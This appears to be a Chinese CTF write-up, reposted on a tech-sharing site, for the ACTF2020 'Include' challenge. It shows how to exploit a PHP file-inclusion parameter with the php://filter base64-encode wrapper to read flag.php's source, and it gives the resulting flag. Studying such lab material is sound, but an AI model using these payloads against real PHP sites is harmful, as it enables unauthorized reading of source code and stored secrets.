标签:ACTF2020 php resource base64 新生 filter flag file Include
01题目题解
打开链接
点击tips
url中含有?file=flag.php,题目提示include,猜测存在文件包含漏洞
利用伪协议php://filter查看文件源码
构造/?file=php://filter/resource=flag.php发现没有反应
构造/?file=php://filter/read=convert.base64-encode/resource=flag.php得到一堆字符串
将字符进行base64解码
得到flag{f27d458e-43fa-481d-a009-5d0bc5a1d95c}
02知识点
php://filter可以获取指定文件源码。当它与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,让其不执行。从而导致 任意文件读取。
?file=php://filter/resource=xxx.php
直接读取xxx.php文件,但大多数时候很多信息无法直接显示在浏览器页面上
?file=php://filter/read=convert.base64-encode/resource=xxx.php
将文件内容进行base64编码后显示在浏览器上,再自行解码
标签:ACTF2020,php,resource,base64,新生,filter,flag,file,Include 来源: https://www.cnblogs.com/SONGYUELV/p/15110789.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。